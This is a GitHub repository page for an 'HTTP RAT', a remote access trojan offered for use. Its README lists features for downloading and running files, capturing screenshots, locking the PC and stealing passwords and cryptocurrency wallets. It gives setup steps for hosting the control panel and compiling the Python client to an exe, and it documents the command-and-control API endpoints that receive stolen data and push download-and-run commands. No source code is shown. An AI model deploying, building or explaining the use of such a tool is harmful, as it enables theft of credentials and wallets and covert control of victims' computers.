Skip to content

appboy707/http-rat

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Reveri-r HTTP RAT

Features

  • Download file & Run
  • Get Screenshot
  • Lock Pc
  • Get Passwords & Wallet

Usage

Step 1

- Upload rat folder to your host
- Configure the database settings (cfg.php)

Step 2

- Change the hostname string in pythonsource (main.py - line 1)
- Convert to exe.

API Usage

POST New PC

  POST /api/reg.php
Parametre Tip Açıklama
actionID string Required. API Key.

Get Pc Data

  POST /api/get.php
Parametre Tip Açıklama
actionID string Required. API Key.

POST Screenshot

  POST /api/getss.php
Parametre Tip Açıklama
actionID string Required. API Key.
screenshot string Required. File Link.
  POST /api/getss.php
Parametre Tip Açıklama
actionID string Required. API Key.
screenshot string Required. File Link.

POST Wallet & Password

  POST /api/wp.php
Parametre Tip Açıklama
actionID string Required. API Key.
wallet string Required. File Link.
password string Required. File Link.

POST Download File & Run

  POST /api/downloadLink.php
Parametre Tip Açıklama
id string Required. API Key.
externalDownload string Required. File Link.

Screenshots

ss

ss

About

HTTP Based Rat

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Hack 66.7%
  • Python 33.3%